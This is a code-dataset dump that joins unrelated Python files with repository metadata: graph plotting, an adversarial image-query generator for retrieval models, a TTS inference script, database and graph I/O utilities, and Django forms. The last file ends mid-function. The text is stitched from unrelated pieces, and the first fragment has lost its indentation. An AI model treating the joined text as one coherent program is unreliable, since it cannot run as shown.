is_3d = (X.shape[1] == 3)
if ax is None:
if is_3d:
from mpl_toolkits.mplot3d import Axes3D
if fig is None:
fig = pyplot.gcf()
ax = Axes3D(fig)
else:
ax = pyplot.gca()
pairs = np.transpose(np.nonzero(W))
t = X[pairs]
# this uses the 'None trick', to insert discontinuties in the line plot
tX = np.empty((t.shape[0], t.shape[1]+1))
tX[:,:-1] = t[:,:,0]
tX[:,-1] = None
tY = tX.copy()
tY[:,:-1] = t[:,:,1]
if is_3d:
tZ = tX.copy()
tZ[:,:-1] = t[:,:,2]
# needs to be a real array, so we use .ravel() instead of .flat
ax.plot(tX.ravel(), tY.ravel(), tZ.ravel(), edge_style, zorder=1)
if vertex_style is not None:
ax.scatter(X[:,0], X[:,1], X[:,2], marker=vertex_style, zorder=2,
edgecolor=vertex_edgecolor, c=vertex_colors, s=vertex_sizes)
else:
# tX.flat looks like: [x1,x2,NaN, x3,x4,Nan, ...]
ax.plot(tX.flat, tY.flat, edge_style, zorder=1)
if vertex_style is not None:
ax.scatter(X[:,0], X[:,1], marker=vertex_style, zorder=2,
edgecolor=vertex_edgecolor, c=vertex_colors, s=vertex_sizes)
if title:
ax.set_title(title)
return pyplot.show
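

if __name__ == '__main__':
  # Minimal illustrative demo (added sketch): connect 20 random 2-d points in a
  # chain and plot the result. The data and adjacency matrix are arbitrary.
  pts = np.random.rand(20, 2)
  adj = np.zeros((20, 20), dtype=bool)
  adj[np.arange(19), np.arange(1, 20)] = True  # edge from each point to the next
  show = show_neighbor_graph(pts, adj, title='chain of random points')
  show()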
| 35.430556 | 94 | 0.607213 | 429 | 2,551 | 3.5338 | 0.284382 | 0.03562 | 0.032322 | 0.029024 | 0.414248 | 0.378628 | 0.349604 | 0.306728 | 0.281662 | 0.163588 | 0 | 0.038226 | 0.23089 | 2,551 | 71 | 95 | 35.929577 | 0.734455 | 0.129753 | 0 | 0.47541 | 0 | 0 | 0.075249 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 1 | 0.032787 | false | 0 | 0.065574 | 0 | 0.131148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6248bbc4cbe43186f9f7f6465992b8eb821afb1c | 3,898 | py | Python | gen_cv_pire.py | SamSweere/CV-PIRE | d857167b3058cb51d10662150c6a4ba3c85f2903 | [
"MIT"
] | null | null | null | gen_cv_pire.py | SamSweere/CV-PIRE | d857167b3058cb51d10662150c6a4ba3c85f2903 | [
"MIT"
] | null | null | null | gen_cv_pire.py | SamSweere/CV-PIRE | d857167b3058cb51d10662150c6a4ba3c85f2903 | [
"MIT"
] | 1 | 2020-01-13T08:43:14.000Z | 2020-01-13T08:43:14.000Z | import os
import argparse
import torch
import torch.nn as nn
import torchvision.models as models
from torch.utils.model_zoo import load_url
from src.gem_init import init_network, ResNetIR
from cv_pire import pert_each_im
parser = argparse.ArgumentParser(description = "Given a neural features extraction model and an image query, generates a adversarial query.")
parser.add_argument("-T", "--iter", type=int, help="Iterative condition, parameter T in the paper.", default="500")
parser.add_argument("-treshold", "--tresh", type=int, help="Treshold for the maximum pixel pertubation.", default="40")
parser.add_argument("-gpu_id", "--gpu", type=int, help="Using GPU or not, cpu please use -1", default="0")
parser.add_argument("-cnnmodel", "--model", help="Pytorch CNN feature extractor which extracts neural features. Now gem and imagenet-res101 available.", default="gem")
parser.add_argument("-in_dir", "--input_dir", help="Directory for original image queries.", default= "./img_input/")
parser.add_argument("-out_dir", "--output_dir", help="Directory for generated adversarial queries.", default="./img_output/")
parser.add_argument("-perception_op", "--p", help="Whether to use perception optimization, function p in the paper.", default=True)
parser.add_argument("-kernelsize", "--kernelsize", type=int, help="Kernel size for the colorvariation calculation.",default="3")
parser.add_argument("-sigma", "--sigma", type=float, help="The standard deviation (sigma) for the gaussian kernel used in the colorvariation calculation. Use a big number to create a uniform kernel", default="1.0")
parser.add_argument("-saveIter", "--saveIter", type=int, help="Save every x iterations, make this the same as T if you only want the last iteration to be saved.",default="100")
args = parser.parse_args()
print("Loading network {}...".format(args.model))
# We use pre-trained GeM from http://cmp.felk.cvut.cz/cnnimageretrieval/
if args.model == "gem":
# download and load GeM model
state = load_url('http://cmp.felk.cvut.cz/cnnimageretrieval/data/networks/retrieval-SfM-120k/retrievalSfM120k-resnet101-gem-b80fb85.pth',
model_dir = './models/')
net_params = {}
net_params['architecture'] = state['meta']['architecture']
net_params['pooling'] = state['meta']['pooling']
net_params['local_whitening'] = state['meta'].get('local_whitening', False)
net_params['regional'] = state['meta'].get('regional', False)
net_params['whitening'] = state['meta'].get('whitening', False)
net_params['mean'] = state['meta']['mean']
net_params['std'] = state['meta']['std']
net_params['pretrained'] = False
net = init_network(net_params)
net.load_state_dict(state['state_dict'])
net.eval()
elif args.model == "imagenet-res101":
net = models.resnet101(pretrained=True)
features = list(net.children())[:-1]
net = ResNetIR(features)
    modules = list(net.children())
    modules[-2][-1] = torch.nn.AdaptiveAvgPool2d((1, 1))
    net = nn.Sequential(*modules)
for p in net.parameters():
p.requires_grad = False
net.eval()
else:
print("do not support other networks yet.")
if args.gpu > -1:
print("Using GPU")
net.cuda()
torch_dev = torch.device('cuda:0')
else:
print("Using CPU")
net.float()
torch_dev = torch.device('cpu')
print("Generating adversarial image query...")
im_list = []
for item in os.listdir(args.input_dir):
try:
if item.split('.')[1] == 'jpg':
im_list.append(item)
except:
pass
for im_name in im_list:
pert_each_im(im_name, model=net, itr=args.iter,
root=args.input_dir, save_dir=args.output_dir, dev=torch_dev, percep_optim=args.p, treshold=args.tresh, kernelsize=args.kernelsize, sigma=args.sigma, saveIter=args.saveIter)
print("Generated adversarial image query have been saved in {}.".format(args.output_dir))
| 41.913978 | 214 | 0.705747 | 547 | 3,898 | 4.917733 | 0.374771 | 0.033457 | 0.063197 | 0.012639 | 0.025279 | 0.025279 | 0 | 0 | 0 | 0 | 0 | 0.013158 | 0.142124 | 3,898 | 92 | 215 | 42.369565 | 0.791268 | 0.025141 | 0 | 0.058824 | 0 | 0.044118 | 0.377239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.014706 | 0.117647 | 0 | 0.117647 | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624cea12769ac05db8d1b66c8b40aa1a525da3cf | 1,685 | py | Python | src/sqlalchemy_declarative/role/base.py | DanCardin/sqlalchemy-declarative | e82da0a03235edfbc2348cf65d3d9e1c944ef0d2 | [
"Apache-2.0"
] | null | null | null | src/sqlalchemy_declarative/role/base.py | DanCardin/sqlalchemy-declarative | e82da0a03235edfbc2348cf65d3d9e1c944ef0d2 | [
"Apache-2.0"
] | null | null | null | src/sqlalchemy_declarative/role/base.py | DanCardin/sqlalchemy-declarative | e82da0a03235edfbc2348cf65d3d9e1c944ef0d2 | [
"Apache-2.0"
] | null | null | null | from dataclasses import astuple, dataclass, field, fields
from datetime import datetime
from typing import List, Optional, Tuple, Union
@dataclass(frozen=True)
class Role:
"""
postgres: https://www.postgresql.org/docs/current/sql-createrole.html
"""
name: str
superuser: Optional[bool] = None
createdb: Optional[bool] = None
createrole: Optional[bool] = None
inherit: Optional[bool] = None
login: Optional[bool] = None
replication: Optional[bool] = None
bypass_rls: Optional[bool] = None
connection_limit: Optional[int] = None
in_roles: Optional[List[str]] = None
@property
def has_option(self):
_, *options = astuple(self)
return any(o is not None for o in options)
@property
def options(self):
for f in fields(self):
if f.name == "name":
continue
value = getattr(self, f.name)
if value is None:
continue
yield f.name, value
@dataclass(frozen=True)
class User(Role):
password: Optional[str] = None
valid_until: Optional[datetime] = None
@dataclass
class Roles:
roles: List[Role] = field(default_factory=list)
ignore_unspecified: bool = False
@classmethod
def options(cls, ignore_unspecified=False):
return cls(ignore_unspecified=ignore_unspecified)
def __iter__(self):
for role in self.roles:
yield role
def are(self, *roles: Tuple[Union[Role, str]]):
return self.__class__(
roles=[role if isinstance(role, Role) else Role(role) for role in roles],
ignore_unspecified=self.ignore_unspecified,
)
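

# Example usage (illustrative names/values):
#
#     roles = Roles.options(ignore_unspecified=True).are(
#         "read_only",                                   # bare name becomes Role("read_only")
#         Role("app", login=True, createdb=False),
#         User("alice", login=True, password="secret"),  # hypothetical credentials
#     )
#
# Iterating over `roles` yields the Role/User objects in declaration order.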
| 24.779412 | 85 | 0.636795 | 202 | 1,685 | 5.207921 | 0.376238 | 0.079848 | 0.106464 | 0.045627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.265282 | 1,685 | 67 | 86 | 25.149254 | 0.849758 | 0.04095 | 0 | 0.12766 | 0 | 0 | 0.0025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0.042553 | 0.06383 | 0.042553 | 0.595745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624defc6a938e443839be55147c520da9febc697 | 9,019 | py | Python | paddlespeech/t2s/exps/inference_streaming.py | SmileGoat/PaddleSpeech | 67994cb8a3f0d3c65446ef9560c69025d6d9a0ef | [
"Apache-2.0"
] | 2 | 2021-11-29T09:02:20.000Z | 2022-02-10T09:30:00.000Z | paddlespeech/t2s/exps/inference_streaming.py | SmileGoat/PaddleSpeech | 67994cb8a3f0d3c65446ef9560c69025d6d9a0ef | [
"Apache-2.0"
] | null | null | null | paddlespeech/t2s/exps/inference_streaming.py | SmileGoat/PaddleSpeech | 67994cb8a3f0d3c65446ef9560c69025d6d9a0ef | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from pathlib import Path
import numpy as np
import paddle
import soundfile as sf
from timer import timer
from paddlespeech.t2s.exps.syn_utils import denorm
from paddlespeech.t2s.exps.syn_utils import get_am_sublayer_output
from paddlespeech.t2s.exps.syn_utils import get_chunks
from paddlespeech.t2s.exps.syn_utils import get_frontend
from paddlespeech.t2s.exps.syn_utils import get_predictor
from paddlespeech.t2s.exps.syn_utils import get_sentences
from paddlespeech.t2s.exps.syn_utils import get_streaming_am_output
from paddlespeech.t2s.exps.syn_utils import get_voc_output
from paddlespeech.t2s.utils import str2bool
def parse_args():
parser = argparse.ArgumentParser(
description="Paddle Infernce with acoustic model & vocoder.")
# acoustic model
parser.add_argument(
'--am',
type=str,
default='fastspeech2_csmsc',
choices=['fastspeech2_csmsc'],
help='Choose acoustic model type of tts task.')
parser.add_argument(
"--am_stat",
type=str,
default=None,
help="mean and standard deviation used to normalize spectrogram when training acoustic model."
)
parser.add_argument(
"--phones_dict", type=str, default=None, help="phone vocabulary file.")
parser.add_argument(
"--tones_dict", type=str, default=None, help="tone vocabulary file.")
parser.add_argument(
"--speaker_dict", type=str, default=None, help="speaker id map file.")
parser.add_argument(
'--spk_id',
type=int,
default=0,
help='spk id for multi speaker acoustic model')
# voc
parser.add_argument(
'--voc',
type=str,
default='pwgan_csmsc',
choices=['pwgan_csmsc', 'mb_melgan_csmsc', 'hifigan_csmsc'],
help='Choose vocoder type of tts task.')
# other
parser.add_argument(
'--lang',
type=str,
default='zh',
help='Choose model language. zh or en')
parser.add_argument(
"--text",
type=str,
help="text to synthesize, a 'utt_id sentence' pair per line")
parser.add_argument(
"--inference_dir", type=str, help="dir to save inference models")
parser.add_argument("--output_dir", type=str, help="output dir")
# inference
parser.add_argument(
"--device",
default="gpu",
choices=["gpu", "cpu"],
help="Device selected for inference.", )
# streaming related
parser.add_argument(
"--am_streaming",
type=str2bool,
default=False,
help="whether use streaming acoustic model")
parser.add_argument(
"--block_size", type=int, default=42, help="block size of am streaming")
parser.add_argument(
"--pad_size", type=int, default=12, help="pad size of am streaming")
args, _ = parser.parse_known_args()
return args
# only inference for models trained with csmsc now
def main():
args = parse_args()
paddle.set_device(args.device)
# frontend
frontend = get_frontend(
lang=args.lang,
phones_dict=args.phones_dict,
tones_dict=args.tones_dict)
# am_predictor
am_encoder_infer_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.am + "_am_encoder_infer" + ".pdmodel",
params_file=args.am + "_am_encoder_infer" + ".pdiparams",
device=args.device)
am_decoder_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.am + "_am_decoder" + ".pdmodel",
params_file=args.am + "_am_decoder" + ".pdiparams",
device=args.device)
am_postnet_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.am + "_am_postnet" + ".pdmodel",
params_file=args.am + "_am_postnet" + ".pdiparams",
device=args.device)
am_mu, am_std = np.load(args.am_stat)
# model: {model_name}_{dataset}
am_dataset = args.am[args.am.rindex('_') + 1:]
# voc_predictor
voc_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.voc + ".pdmodel",
params_file=args.voc + ".pdiparams",
device=args.device)
output_dir = Path(args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
sentences = get_sentences(text_file=args.text, lang=args.lang)
merge_sentences = True
fs = 24000 if am_dataset != 'ljspeech' else 22050
# warmup
for utt_id, sentence in sentences[:3]:
with timer() as t:
normalized_mel = get_streaming_am_output(
input=sentence,
am_encoder_infer_predictor=am_encoder_infer_predictor,
am_decoder_predictor=am_decoder_predictor,
am_postnet_predictor=am_postnet_predictor,
frontend=frontend,
lang=args.lang,
merge_sentences=merge_sentences, )
mel = denorm(normalized_mel, am_mu, am_std)
wav = get_voc_output(voc_predictor=voc_predictor, input=mel)
speed = wav.size / t.elapse
rtf = fs / speed
print(
f"{utt_id}, mel: {mel.shape}, wave: {wav.shape}, time: {t.elapse}s, Hz: {speed}, RTF: {rtf}."
)
print("warm up done!")
N = 0
T = 0
block_size = args.block_size
pad_size = args.pad_size
get_tone_ids = False
for utt_id, sentence in sentences:
with timer() as t:
# frontend
if args.lang == 'zh':
input_ids = frontend.get_input_ids(
sentence,
merge_sentences=merge_sentences,
get_tone_ids=get_tone_ids)
phone_ids = input_ids["phone_ids"]
else:
print("lang should be 'zh' here!")
phones = phone_ids[0].numpy()
# acoustic model
orig_hs = get_am_sublayer_output(
am_encoder_infer_predictor, input=phones)
if args.am_streaming:
hss = get_chunks(orig_hs, block_size, pad_size)
chunk_num = len(hss)
mel_list = []
for i, hs in enumerate(hss):
am_decoder_output = get_am_sublayer_output(
am_decoder_predictor, input=hs)
am_postnet_output = get_am_sublayer_output(
am_postnet_predictor,
input=np.transpose(am_decoder_output, (0, 2, 1)))
am_output_data = am_decoder_output + np.transpose(
am_postnet_output, (0, 2, 1))
normalized_mel = am_output_data[0]
sub_mel = denorm(normalized_mel, am_mu, am_std)
# clip output part of pad
if i == 0:
sub_mel = sub_mel[:-pad_size]
elif i == chunk_num - 1:
                        # the right side of the last chunk is never fully padded
sub_mel = sub_mel[pad_size:]
else:
                        # the right side of the last few chunks may also not be fully padded
sub_mel = sub_mel[pad_size:(block_size + pad_size) -
sub_mel.shape[0]]
mel_list.append(sub_mel)
mel = np.concatenate(mel_list, axis=0)
else:
am_decoder_output = get_am_sublayer_output(
am_decoder_predictor, input=orig_hs)
am_postnet_output = get_am_sublayer_output(
am_postnet_predictor,
input=np.transpose(am_decoder_output, (0, 2, 1)))
am_output_data = am_decoder_output + np.transpose(
am_postnet_output, (0, 2, 1))
normalized_mel = am_output_data[0]
mel = denorm(normalized_mel, am_mu, am_std)
# vocoder
wav = get_voc_output(voc_predictor=voc_predictor, input=mel)
N += wav.size
T += t.elapse
speed = wav.size / t.elapse
rtf = fs / speed
sf.write(output_dir / (utt_id + ".wav"), wav, samplerate=24000)
print(
f"{utt_id}, mel: {mel.shape}, wave: {wav.shape}, time: {t.elapse}s, Hz: {speed}, RTF: {rtf}."
)
print(f"{utt_id} done!")
print(f"generation speed: {N / T}Hz, RTF: {fs / (N / T) }")
if __name__ == "__main__":
main()
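
# Note on the streaming chunking above (illustrative, using the default values):
# with block_size=42 and pad_size=12, get_chunks() is expected to yield overlapping
# hidden-state windows of roughly pad + block + pad frames. After decoding, the
# first chunk drops its right pad, the last chunk drops its left pad, and middle
# chunks drop both, so the concatenated mel matches the non-streaming output length.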
| 36.220884 | 105 | 0.60428 | 1,117 | 9,019 | 4.63205 | 0.225604 | 0.026092 | 0.049285 | 0.035562 | 0.417279 | 0.327793 | 0.279474 | 0.272323 | 0.195593 | 0.177812 | 0 | 0.010103 | 0.297594 | 9,019 | 248 | 106 | 36.366935 | 0.80663 | 0.094356 | 0 | 0.314136 | 0 | 0.015707 | 0.153619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010471 | false | 0 | 0.078534 | 0 | 0.094241 | 0.031414 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624f03a50768131b5be5b3aa75eebf35695e5864 | 1,214 | py | Python | ichnaea/models/tests/test_wifi.py | JaredKerim-Mozilla/ichnaea | cfaef2b903960374050be3ea2e4c1520687de56b | [
"Apache-1.1"
] | null | null | null | ichnaea/models/tests/test_wifi.py | JaredKerim-Mozilla/ichnaea | cfaef2b903960374050be3ea2e4c1520687de56b | [
"Apache-1.1"
] | null | null | null | ichnaea/models/tests/test_wifi.py | JaredKerim-Mozilla/ichnaea | cfaef2b903960374050be3ea2e4c1520687de56b | [
"Apache-1.1"
] | null | null | null | from sqlalchemy.exc import IntegrityError
from ichnaea.models.wifi import (
Wifi,
WifiBlacklist,
)
from ichnaea.tests.base import (
DBTestCase,
GB_LAT,
GB_LON,
)
class TestWifi(DBTestCase):
def test_fields(self):
session = self.session
session.add(Wifi(
key='3680873e9b83', lat=GB_LAT, lon=GB_LON, range=200))
session.flush()
result = session.query(Wifi).first()
self.assertEqual(result.key, '3680873e9b83')
self.assertEqual(result.lat, GB_LAT)
self.assertEqual(result.lon, GB_LON)
self.assertEqual(result.range, 200)
class TestWifiBlacklist(DBTestCase):
def test_fields(self):
session = self.session
session.add(WifiBlacklist(key='3680873e9b83', count=2))
session.flush()
result = session.query(WifiBlacklist).first()
self.assertEqual(result.key, '3680873e9b83')
self.assertEqual(result.count, 2)
def test_unique_key(self):
session = self.session
session.add(WifiBlacklist(key='3680873e9b83'))
session.flush()
session.add(WifiBlacklist(key='3680873e9b83'))
self.assertRaises(IntegrityError, session.flush)
| 25.829787 | 67 | 0.658979 | 133 | 1,214 | 5.93985 | 0.278195 | 0.083544 | 0.159494 | 0.083544 | 0.531646 | 0.407595 | 0.407595 | 0.407595 | 0.407595 | 0.139241 | 0 | 0.072572 | 0.228171 | 1,214 | 46 | 68 | 26.391304 | 0.770544 | 0 | 0 | 0.342857 | 0 | 0 | 0.059308 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.085714 | false | 0 | 0.085714 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6250812328fe0910ddd3cb883062f15468f61a5c | 6,327 | py | Python | utilities/dataIO.py | bmatejek/addax | 3b41733be7fd2de9519d9ac22366345a4a37bc91 | [
"MIT"
] | 3 | 2020-12-09T17:54:29.000Z | 2021-12-17T13:02:37.000Z | utilities/dataIO.py | bmatejek/addax | 3b41733be7fd2de9519d9ac22366345a4a37bc91 | [
"MIT"
] | null | null | null | utilities/dataIO.py | bmatejek/addax | 3b41733be7fd2de9519d9ac22366345a4a37bc91 | [
"MIT"
] | 2 | 2020-12-09T17:55:13.000Z | 2020-12-09T17:55:17.000Z | import bz2
import pickle
import struct
from addax.data_structures.graph import Graph
def ReadGraph(input_filename, header_only = False, vertices_only = False):
"""
Read a graph data structure from disk
@param input_filename: the filename where the graph data is stored
    @param header_only: boolean flag that, if True, reads only the graph attributes
    @param vertices_only: boolean flag that determines if edges are read
"""
assert (input_filename.endswith('.graph.bz2'))
data = bz2.decompress(open(input_filename, 'rb').read())
byte_index = 0
# read the basic attributes for the graph
nvertices, nedges, directed, vertex_colored, edge_colored = struct.unpack('qq???', data[byte_index:byte_index + 19])
byte_index += 19
# read the prefix
prefix, = struct.unpack('128s', data[byte_index:byte_index + 128])
byte_index += 128
prefix = prefix.decode().strip('\0')
graph = Graph(prefix, directed, vertex_colored, edge_colored)
if header_only: return graph
# read all the vertices and add them to the graph
for _ in range(nvertices):
index, enumeration_index, community, color, = struct.unpack('qqqh', data[byte_index:byte_index + 26])
byte_index += 26
graph.AddVertex(index, enumeration_index, community, color)
# if the flag to read only vertices is on, avoid reading edges
if vertices_only: return graph
# read all of the edges and add them to the graph
for _ in range(nedges):
source_index, destination_index, weight, color, = struct.unpack('qqdb', data[byte_index:byte_index + 25])
byte_index += 25
graph.AddEdge(source_index, destination_index, weight, color)
# read the vertex type mappings
nvertex_types, = struct.unpack('q', data[byte_index:byte_index + 8])
assert (nvertex_types <= 65536)
byte_index += 8
vertex_type_mapping = {}
for _ in range(nvertex_types):
index, = struct.unpack('q', data[byte_index:byte_index + 8])
byte_index += 8
vertex_type, = struct.unpack('128s', data[byte_index:byte_index + 128])
byte_index += 128
vertex_type_mapping[index] = vertex_type.decode().strip('\0')
if graph.vertex_colored: graph.SetVertexTypeMapping(vertex_type_mapping)
# read the edge type mappings
nedge_types, = struct.unpack('q', data[byte_index:byte_index + 8])
assert (nedge_types <= 7)
byte_index += 8
edge_type_mapping = {}
for _ in range(nedge_types):
index, = struct.unpack('q', data[byte_index:byte_index + 8])
byte_index += 8
edge_type, = struct.unpack('128s', data[byte_index:byte_index + 128])
byte_index += 128
edge_type_mapping[index] = edge_type.decode().strip('\0')
if graph.edge_colored: graph.SetEdgeTypeMapping(edge_type_mapping)
return graph
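
# Illustrative usage sketch (not part of the original module): assumes a file
# 'example.graph.bz2' previously produced by WriteGraph() below exists on disk;
# the file name itself is made up.
#
#   graph = ReadGraph('example.graph.bz2', vertices_only=True)   # skip the edge section
#   print(graph.prefix, graph.NVertices())
#   prefix = ReadPrefix('example.graph.bz2')                      # header-only helper
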
def ReadPrefix(input_filename):
    """
    Read the prefix of a graph data structure from disk

    @param input_filename: the filename where the graph data is stored
    """
    assert (input_filename.endswith('.graph.bz2'))

    data = bz2.decompress(open(input_filename, 'rb').read())
    byte_index = 0

    # read the basic attributes for the graph
    nvertices, nedges, directed, vertex_colored, edge_colored = struct.unpack('qq???', data[byte_index:byte_index + 19])
    byte_index += 19

    # read the prefix
    prefix, = struct.unpack('128s', data[byte_index:byte_index + 128])
    byte_index += 128
    prefix = prefix.decode().strip('\0')

    return prefix

def WriteGraph(graph, output_filename):
    """
    Write a graph to disk for later I/O access

    @param graph: the graph data structure to save to disk
    @param output_filename: the location to save the graph data structure
    """
    assert (output_filename.endswith('.graph.bz2'))

    # create a new compression object
    compressor = bz2.BZ2Compressor()

    # write the basic attributes for the graph to disk
    nvertices = graph.NVertices()
    nedges = graph.NEdges()
    directed = graph.directed
    vertex_colored = graph.vertex_colored
    edge_colored = graph.edge_colored
    prefix = graph.prefix

    # create an empty byte array which we will concatenate later
    compressed_graph = []
    compressed_graph.append(compressor.compress(struct.pack('qq???', nvertices, nedges, directed, vertex_colored, edge_colored)))
    compressed_graph.append(compressor.compress(struct.pack('128s', prefix.encode())))

    # write all of the vertices and their attributes
    for vertex in graph.vertices.values():
        compressed_graph.append(compressor.compress(struct.pack('qqqh', vertex.index, vertex.enumeration_index, vertex.community, vertex.color)))

    # write all of the edges and their attributes
    for edge in graph.edges.values():
        compressed_graph.append(compressor.compress(struct.pack('qqdb', edge.source_index, edge.destination_index, edge.weight, edge.color)))

    # write the vertex types
    nvertex_types = len(graph.vertex_type_mapping)
    compressed_graph.append(compressor.compress(struct.pack('q', nvertex_types)))
    for index, vertex_type in graph.vertex_type_mapping.items():
        compressed_graph.append(compressor.compress(struct.pack('q128s', index, vertex_type.encode())))

    # write the edge types
    nedge_types = len(graph.edge_type_mapping)
    compressed_graph.append(compressor.compress(struct.pack('q', nedge_types)))
    for index, edge_type in graph.edge_type_mapping.items():
        compressed_graph.append(compressor.compress(struct.pack('q128s', index, edge_type.encode())))

    # flush the data
    compressed_graph.append(compressor.flush())

    # convert the array into a binary string - faster than native implementation
    compressed_graph = b''.join(compressed_graph)

    # write the compressed string to file
    with open(output_filename, 'wb') as fd:
        fd.write(compressed_graph)

def PickleData(data, filename):
    """
    Pickle the data and write to disk

    @param data: the data to pickle
    @param filename: the location to save the pickled data
    """
    with open(filename, 'wb') as fd:
        pickle.dump(data, fd)


def ReadPickledData(filename):
    """
    Read pickled data from disk and return object

    @param filename: the location of the saved pickled data
    """
    with open(filename, 'rb') as fd:
        return pickle.load(fd)
| 32.116751 | 145 | 0.696223 | 845 | 6,327 | 5.054438 | 0.176331 | 0.080075 | 0.036525 | 0.047764 | 0.52634 | 0.443924 | 0.395458 | 0.361508 | 0.335753 | 0.321705 | 0 | 0.017603 | 0.200885 | 6,327 | 196 | 146 | 32.280612 | 0.827136 | 0.223961 | 0 | 0.263736 | 0 | 0 | 0.024038 | 0 | 0 | 0 | 0 | 0 | 0.054945 | 1 | 0.054945 | false | 0 | 0.043956 | 0 | 0.131868 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6250e3e3613e8b322cfe7d8a32dbc2d49d2b96dd | 921 | py | Python | chat/forms.py | crazyskateface/LC | 6e59b0083d78bca02d08dbc7ce612c6fc4ed44a6 | [
"MIT"
] | 1 | 2015-04-13T19:23:57.000Z | 2015-04-13T19:23:57.000Z | chat/forms.py | crazyskateface/LC | 6e59b0083d78bca02d08dbc7ce612c6fc4ed44a6 | [
"MIT"
] | null | null | null | chat/forms.py | crazyskateface/LC | 6e59b0083d78bca02d08dbc7ce612c6fc4ed44a6 | [
"MIT"
] | null | null | null | from chat.models import UserProfile
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django import forms
class UserForm(UserCreationForm):
    class Meta:
        model = User
        fields = ('username', 'password1', 'password2')


class UserProfileForm(forms.ModelForm):
    class Meta:
        model = UserProfile
        fields = ('ign', 'primRole', 'secRole')

    def clean_ign(self):
        ign = self.cleaned_data['ign']
        if UserProfile.objects.exclude(pk=self.instance.pk).filter(ign=ign).exists():
            raise forms.ValidationError(u'Summoner name already in use: %(ign)s',
                                        code='invalid',
                                        params={'ign': ign},
                                        )
        return ign
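
# Illustrative sketch (not part of the original module): how the unique-IGN check in
# clean_ign() surfaces during normal form validation; the field values are made up.
#
#   form = UserProfileForm(data={'ign': 'Faker', 'primRole': 'Mid', 'secRole': 'Top'})
#   if not form.is_valid():
#       print(form.errors['ign'])   # e.g. "Summoner name already in use: Faker"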
| 28.78125 | 86 | 0.525516 | 85 | 921 | 5.670588 | 0.576471 | 0.062241 | 0.070539 | 0.087137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003515 | 0.382193 | 921 | 31 | 87 | 29.709677 | 0.843585 | 0 | 0 | 0.1 | 0 | 0 | 0.105618 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0.05 | 0.2 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6251e14bb335b87e274599d8e9f0516b94c28639 | 812 | py | Python | gendiff/file_loader.py | vetalpaprotsky/python-project-lvl2 | b309ab19dbb122c93f8f5c468ad6e1c35dd8df93 | [
"MIT"
] | null | null | null | gendiff/file_loader.py | vetalpaprotsky/python-project-lvl2 | b309ab19dbb122c93f8f5c468ad6e1c35dd8df93 | [
"MIT"
] | null | null | null | gendiff/file_loader.py | vetalpaprotsky/python-project-lvl2 | b309ab19dbb122c93f8f5c468ad6e1c35dd8df93 | [
"MIT"
] | 1 | 2020-11-24T17:56:29.000Z | 2020-11-24T17:56:29.000Z | import os
import json
import yaml
def load_file(file_path):
    file_type = _get_file_type(file_path)
    with open(file_path) as file:
        return _parse_file(file, file_type)


